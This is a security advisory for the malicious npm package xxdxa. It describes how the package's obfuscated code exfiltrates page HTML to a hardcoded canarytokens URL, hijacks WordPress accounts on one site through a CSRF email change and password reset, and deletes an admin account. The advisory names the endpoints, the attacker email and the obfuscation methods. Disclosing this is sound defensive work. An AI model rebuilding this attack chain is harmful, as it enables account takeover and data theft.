MAL-2026-10752
Malicious code in xxdxa (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (26a77171f4b68ff814a7a99b5e51e3d59b9d4ca41fefbd650d2a0f8412878360) The package's sole file i.js (declared as main) is a heavily obfuscated IIFE whose top-level exploit() runs unconditionally when the module is loaded. In a browser context on noviembrenacional.com it reads document.documentElement.outerHTML, base64-encodes it, and POSTs it (body 'type=page_html&data=...') to a hardcoded canarytokens.com endpoint (canarytokens.com/images/terms/e63c36xvesfv8udb0yiy1xztu/contact.php), along with status beacons (start, username, no_user_span, no_nonce, exploit_success, error). When the visitor is a logged-in WordPress user on that site whose username is neither 'JuanCuesta' nor 'noviembrenacional', it fetches /my-account/editar-cuenta/, extracts the save-account-details nonce and referer, and submits a same-origin CSRF POST that overwrites the victim's account email to nyxalor_25@proton.me, then triggers a password reset — an account takeover. For the 'noviembrenacional' admin user it instead POSTs to /members/<user>/settings/delete-account/. In Node (no window), the top-level call throws and the catch handler issues fetch(CANARY_URL + '?type=error&msg=...'), leaking a beacon (including the installer's public IP and an error string) to the attacker's canarytokens URL at require/import time. URLs, DOM property names, form field names, endpoints, and the attacker email are hidden via \uXXXX escapes, reversed-string decoding (e.g. '/srebmem/'.split('').reverse().join('') → '/members/'), and dead-code XOR expressions, existing solely to conceal the exfiltration destination and WordPress attack targets.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for xxdxa (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/xxdxa/v/1.0.3 [PACKAGE]
- https://www.npmjs.com/package/xxdxa/v/1.0.2 [PACKAGE]
- https://www.npmjs.com/package/xxdxa/v/1.0.4 [PACKAGE]
- https://www.npmjs.com/package/xxdxa/v/1.0.5 [PACKAGE]
- https://www.npmjs.com/package/xxdxa/v/1.0.7 [PACKAGE]
- https://www.npmjs.com/package/xxdxa/v/1.0.1 [PACKAGE]